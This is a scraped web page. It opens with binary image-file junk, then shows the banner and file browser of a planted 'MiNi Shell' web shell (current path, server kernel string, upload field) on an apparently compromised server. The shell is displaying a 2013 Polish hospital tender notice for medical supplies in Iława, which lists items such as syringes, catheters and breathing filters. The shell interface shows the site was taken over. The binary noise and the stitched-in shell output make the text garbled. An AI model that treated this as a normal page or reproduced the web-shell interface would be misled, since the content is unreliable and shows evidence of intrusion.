JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131113/461484-N-2013.html

<p class="kh_header"><b>Iława: 49/2013 Dostawa wyrobów medycznych</b><br>
<b>Numer ogłoszenia: 461484 - 2013; data zamieszczenia: 13.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 49/2013 Dostawa wyrobów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wyrobów medycznych z podziałem na 32 zadania dla Powiatowego Szpitala w Iławie (nr sprawy 49/2013)
Zadanie nr 1 Strzykawki, igły
Zadanie nr 2 Inny drobny sprzęt medyczny
Zadanie nr3 Staza bezlateksowa
Zadanie nr 4 Smoczek do karmienia
Zadanie nr 5 Obwody oddechowe jednorazowe
Zadanie nr 6 Rurki krtaniowe
Zadanie nr 7 Tracheostomia
Zadanie nr 8 Kranik tródrożny
Zadanie nr 9 Prowadnica do trudnych intubacji
Zadanie nr 10 Zestaw do nadłonowego drenażu pęcherza moczowego
Zadanie nr 11 Papiery rejestracyjne
Zadanie nr 12 Sprzęt jednorazowy do pobierania materiałów
Zadanie nr 13 Siatki do przepuklin
Zadanie nr 14 Pojemniki na badania histopatologiczne  
Zadanie nr 15 Zestaw do toalety jamy ustnej
Zadanie nr 16 Mankiety do pomiaru nieinwazyjnego RR  jednoprzewodowe
Zadanie nr 17 Mankiety do pomiaru nieinwazyjnego RR  dwuprzewodowe
Zadanie nr 18 Ciśnieniomierze zegarowe i części zamienne
Zadanie nr 19 Czujnik do saturacji
Zadanie nr 20 Ostrza chirurgiczne
Zadanie nr 21 Serweta z włókniny
Zadanie nr 22 Maski, czepki, fartuchy
Zadanie nr 23 Fartuchy chirurgiczne  sterylne
Zadanie nr 24 Regulator ssania do wysokiej próżni
Zadanie nr 25 Reduktor do tlenu
Zadanie nr 26 Strzygarka chirurgiczna
Zadanie nr 27 Laryngoskopy jednorazowe i łyżki jednorazowe
Zadanie nr 28 Pościel jednorazowa
Zadanie nr 29 Tace do leków
Zadanie nr 30 Miska nerkowata jednorazowa
Zadanie nr 31 Kleszcze biopsyjne wielorazowe
Zadanie nr 32 Urządzenie wielorazowego użytku do usuwania zszywek skórnych
Obowiązki Wykonawcy :
1) dostawa i transport
2) rozładunek i wnoszenie do pomieszczenia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.10.00-0, 33.68.10.00-7, 33.12.41.30-5, 38.42.31.00-7, 39.51.80.00-6, 33.19.80.00-4, 42.13.11.00-7, 33.16.90.00-2, 33.14.00.00-3, 33.16.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy 2. Wypełniony formularz specyfikacji przedmiotowej (formularz cenowy) 3.Zaakceptowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do złożonej oferty gdy:
1.1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
1.2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
1.3. w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
1.4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
- w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
1.5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, 
w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian.
1.6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć 
w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.
2.   Wprowadzenie zmian określonych w ust. 1 wymaga uzasadnienia konieczności zmiany i porozumienia stron oraz sporządzenia aneksu do umowy.
Wszelkie zmiany do umowy wymagają zgody Zamawiającego oraz pod rygorem nieważności zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> owiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Strzykawki, igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Strzykawka tuberkulinowa 1ml z igłą /opakowanie 100 sztuk/	100 sztuk	8
2	Igła j.u. do iniekcji rozmiar 1,2x40mm, z ostrym zakończeniem, odporna na odkształcenia, drożna, sterylna /opakowanie 100sztuk/	100 sztuk	1100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Inny drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do irygacji lewatywy j.u. w skład którego wchodzi:                1)dren o długości minimum 1200mm z przesuwanym zaciskiem na drenie                                                                                           2)kanka zakończona otworem centralnym                                      3)worek o pojemności pomiędzy 1500ml-2000ml włącznie z podziałką co 250ml	sztuka	120
Worek do zbiórki moczu j.u. poj. 2000ml z odpływem niesterylny, zawór spustowy, podziałka co 100ml.,dren niezałamujący się od 1000mm-1200mm, z uchwytem	sztuka	1300
Maska do podawania tlenu z drenem i nebulizatorem dla dorosłych 	sztuka	500
Szpatułka drewniana laryngologiczna, pakowane pojedynczo, 	100 sztuk	110
Kanka plastikowa do odbytnicy 10x300	sztuka	15
Szyna do unieruchamiania kończyn aluminiowa składa się z szyny aluminiowej i wyściółki poliuretanowej wielkość  400x20mm (+-5%),	sztuka	150
Rurka rektoskopowa 20mmx250mm	sztuka	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr3 Staza bezlateksowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bezlateksowa staza  j.u. (opakowanie 25 sztuk) typu Stretch Tourniquet lub równoważne	Opakowanie 25 sztuk	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 Smoczek i butelka do karmienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Butelka jednorazowa pakowana pojedynczo, sterylna o pojemności 140 ml z nakrętką z podziałką wykonana z polipropylenu przeznaczona do żywienia niemowląt posiadająca atest PZH. Butelki kompatybilne ze smoczkami z pozycji	sztuka	300
Smoczek jednorazowy pakowany pojedynczo z nakrętką sterylny wykonany z naturalnego lateksu do żywienia niemowląt kompatybilny z butelką opisaną w pozycji nr 1 i 2 oraz gotowymi mieszankami , posiadający atest PZH. Rozmiar 0-6 miesięcy i powyżej 6 miesięcy.	sztuka	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.68.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 Obwody oddechowe jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtr elektrostatyczny, bakteryjno- wirusowy, sterylnie pakowany z portem do podłączenia kapnografu, o zakresie objętości 150-1200ml, waga 19-20g	sztuka	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 Rurki krtaniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurka krtaniowa dwuświatłowa LTS D VBTC 006 z możliwością odessania cewnikiem  Nr 2 od 12-25 kg z PCV, pakowana sterylnie	sztuka	10
Rurka krtaniowa dwuświatłowa LTS D VBTC 006 z możliwością odessania cewnikiem CH16 Nr 3<155 cm(wzrost pacjenta) i Nr 4<155-180 cm (wzrost pacjenta), wykonana z PCV, pakowana sterylnie	sztuka	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 Tracheostomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Precyzyjny regulator przepływu, zakończony męskim/ żeńskim połączeniem Luer - Luck, zakres regulacji przepływu od 2ml/h do 350 ml/h, przeznaczony do przetaczania płynów i lipidów	sztuka	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 Kranik tródrożny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kranik trójdrożny z wyczuwalnym lub widocznym optycznie indykatorem pozycji zamknięte-otwarte, wykonany z materiału odpornego na lipidy	sztuka	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 Prowadnica do trudnych intubacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadnica elastyczna do trudnych intubacji- Bugie, średnica zewnętrzna 15 Ch, długość 600 mm, wielokrotnego użytku, zagięty koniec 2cm ułatwiający wprowadzenie, termoplastyczna, elastyczna, skalowana, wykonana z poliestrowej plecionki, żywicowana.	sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 Zestaw do nadłonowego drenażu pęcherza moczowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do nadłonowego drenażu pęcherza moczowego składający się z: kaniuli punkcyjnej rozdzieralnej 14 CH; cewnika wykonanego z poliuretanu długości 65cm z kolorowym oznakowaniem długości, z otworami bocznymi, zawiniętym końcem i zaciskiem przesuwnym; worka na mocz 1,5l,płytki mocującej	sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 Papiery rejestracyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier do aparatu EKG Ascard 3 104mmx40 kratka	rolka	60
Papier do aparatu Schiller AT-6 145x100mmx350	bloczek	10
Papier do videoprintera Mitsubishi K-61B 110mmx21,termoczuły,przeznaczony do czarno-białych wideoprinterów	rolka	80
Papier do aparatu ekg Mr Silver, Mr Blue (Ascard) 112mmx25m	rolka	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12 Sprzęt jednorazowy do pobierania materiałów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemnik z łopatką, z zamknięciem, sterylny	szt.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 Siatki do przepuklin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatki do przepuklin-nieabsorbowalna,sterylna siatka do przepuklin, przezroczysta wykonana z polipropylenu monfilamentowa o wymiarach 35cmx22cm(+/_5%)	sztuka	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 Pojemniki na badania histopatologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemniki polipropylenowe z pokrywką i zakrętką odporne na formalinę, o pojemności 125 -150 ml	sztuka	500
Pojemniki polipropylenowe z pokrywką i zakrętką odporne na formalinę, o pojemności 1000 ml	sztuka	20
Pojemniki polipropylenowe z pokrywką i zakrętką odporne na formalinę, o pojemności 2000 ml	sztuka	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 Zestaw do toalety jamy ustnej.</p>
